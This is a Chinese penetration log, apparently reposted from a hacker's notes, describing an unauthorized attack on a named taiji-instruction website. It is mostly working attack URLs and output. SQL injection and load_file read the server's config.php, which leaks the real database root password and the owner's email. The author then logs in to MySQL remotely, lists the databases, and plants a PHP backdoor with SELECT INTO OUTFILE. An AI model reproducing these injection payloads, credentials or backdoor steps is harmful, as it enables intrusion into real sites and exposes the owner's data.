作者:鸡哥
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48’
返回出错,爆出了路径
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 930
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 931
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 932
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 933
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 934
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 935
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 936
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 937
来源: 作者: 点击: 上传时间:
Warning: disparticlecontent(): Failed opening ’’ for inclusion (include_path=’.;c:\php4\pear’) in d:\site\bin\sys\config.php on line 960
*********************************************************
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20order%20by%209/*
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20order%20by%2010/*
order by 9 正常
order by 10 出错
***************************
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9/*
数字:5
**********************
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,user(),6,7,8,9/*
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,version(),6,7,8,9/*
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,database(),6,7,8,9/*
1:在数字5上输入:user()
2:在数字5上输入:version()
3:在数字5上输入:database()
1:爆出用户名:root@localhost
2:系统版本:4.0.17-nt
3:数据库名:czxtaiji
CMD下Ping了下站点
ping www.czxtaiji.net
TTL=113 (DOS系统)
这里不推荐直接判断是DOS系统,因为TTL值是可以修改的
**********************************
既然是ROOT,看看可以读文件不?
在 数字5的位置输入:load_file()
c:\boot.ini 需要经过16进制编码转换,
为什么要转换?
因为本函数无法处理直接写的路径,只能能使用16进制或者是 Ascii 编码.
所以要将路径转换成 16进制或者是Ascii 编码才可以执行
我们可以打开海洋顶端网PHP注射工具,编码转换-To Hex
c:\boot.ini 转换后得到结果:0x633A5C626F6F742E696E69
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,load_file
(0x633A5C626F6F742E696E69),6,7,8,9/*
页面数字5的位置显示(显示如下说明可以读文件):
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)part
****************************************
我们继续讲路径:d:\site\bin\sys\config.php 经过编码转换
d:\site\bin\sys\config.php 转换后结果:0x643A5C736974655C62696E5C7379735C636F6E6669672E706870
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),6,7,8,9/*
没有显示任何东西
**************************
查看源代码,发现如下内容:
//==== 系统环境变数定义档 ====//
$def_system_name = "陈振肖太极网";
$def_version = "1.0.0";
$def_Update = "2
可以读到,但是有长度限制
一个个爆表爆字段,然后找然后,传php马也可以
但万一找不到后台,密码又解不出,那也没用@
*************************************************
我们可以利用 substring 函数
Substring(str,pos,len)函数解决问题.
他的意思是从字符串str的pos位位置起返回len个字符的子串.譬如Substring(load_file(A),50,100)
就是把A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),150,50),6,7,8,9/*
读到如下内容:
yName = "WebAdmin"; $def_myURL = "http://www.
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),150,100),6,7,8,9/*
读到如下内容:
yName = "WebAdmin"; $def_myURL = "http://www.****.net/"; //$def_myURL = "http://Localho
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),150,150),6,7,8,9/*
读到如下内容:
yName = "WebAdmin"; $def_myURL = "http://www.****.net/"; //$def_myURL = "http://Localhost/"; $def_myStreamURL =
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),250,300),6,7,8,9/*
继续读,读到如下内容:
st/"; $def_myStreamURL = "rtsp://www.czxtaiji.net:554/taiji/"; //$def_myStreamURL = "rtsp://Localhost:554/taiji/"; $d
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),50,550),6,7,8,9/*
继续读,读到如下内容:
system_name = "陈振肖太极网"; $def_version = "1.0.0"; $def_Update = "2005/01/01"; $def_myName = "WebAdmin"; $def
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),4,550),6,7,8,9/*
继续读,读到如下内容:
hp //==== 系统环境变数定义档 ====// $def_system_name = "陈振肖太极网"; $def_version = "1.0.0"; $def_Update = "2005
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),510,300),6,7,8,9/*
继续读,读到如下内容:
"Article/" ; $def_page_top = $def_myURL . "pages/page_top.htm" ; $def_page_foot = $def_myURL . "pages/page_foot_1.htm"
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),410,300),6,7,8,9/*
继续读,读到如下内容:
$def_myEmail = "chenzhenxiao@sina.com"; //系统目录配置 $def_article_dir = $def_myURL . "Article/" ; $def_page_
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),350,300),6,7,8,9/*
继续读,读到如下内容:
Localhost:554/taiji/"; $def_myURL_Title = "陈振肖太极网"; $def_myEmail = "chenzhenxiao@sina.com"; //系统目录配置
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),270,300),6,7,8,9/*
继续读,读到如下内容:
amURL = "rtsp://www.czxtaiji.net:554/taiji/"; //$def_myStreamURL = "rtsp://Localhost:554/taiji/"; $def_myURL_Title = "陈
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),800,300),6,7,8,9/*
继续读,读到如下内容:
oot"; // 资料库帐号 $def_db_passwd = "wenminyjh"; // 管理密码 $def_select_db = "czxtaiji"; // 测试用 - 留言版资料库
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),730,300),6,7,8,9/*
继续读,读到如下内容:
def_db_local = "localhost"; // 资料库连结位址 $def_db_admin = "root"; // 资料库帐号 $def_db_passwd = "wenminyjh"; /
*************到这里,root帐号和密码都读出来了
http://www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file
(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),780,300),6,7,8,9/*
继续读,读到如下内容:
def_db_admin = "root"; // 资料库帐号 $def_db_passwd = "wenminyjh"; // 管理密码 $def_select_db = "czxtaiji"; // 测?/font>
***************不错,又读出了 数据库名,即使这里我们之前已经知道了
我们来连接下
安装phpStudy.exe
然后在 *:\phpStudy\MySQL\bin 目录下放个 1.bat,里面写cmd,保存,打开,
轻微渗透陈振肖太极网(渗透笔记)
,电脑资料
《轻微渗透陈振肖太极网(渗透笔记)》(https://www.unjs.com)。。然后写入:mysql -hwww.****.net -uroot -p123456
说下把,-h后面的是域名,-u后面的是帐号,-p后面是密码
返回如下内容:
E:\phpStudy\MySQL\bin>mysql -hwww.czxtaiji.net -uroot -pwenminyjh
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5078
Server version: 4.0.17-nt
Type ’help;’ or ’\h’ for help. Type ’\c’ to clear the buffer.
mysql>
**************************************
mysql> select version();
+-----------+
| version() |
+-----------+
| 4.0.17-nt |
+-----------+
1 row in set (0.19 sec)
mysql>
********************************************
mysql> show databases;
+------------+
| Database |
+------------+
| chat |
| czx_discuz |
| czx_uc |
| czxtaiji |
| dear |
| mmm |
| mydb |
| mysql |
| mytestdb |
| sss |
| taiji |
| tx |
| 复件 taiji |
+------------+
13 rows in set (0.21 sec)
mysql>
***************************************这里是数据库,大家看下
我们依次执行以下语句:
create table a(str TEXT);
insert into a values("");
select * from a into outfile ’d:\\site\\bin\\ai.php’;
其中”“是LANKER微型PHP后门服务端代码,
d:\\site\\bin\\这个是PHPMYADMIN的路径,d:\\site\\是绝对路径。。
确定后成功返回结果,然后用lanker微型PHP后门客户端连接上传PHP木马,
http://www.****.net/bin/ai.php 密码:a
可以查看服务器信息,CMD执行出错,无法上传文件,3389端口被改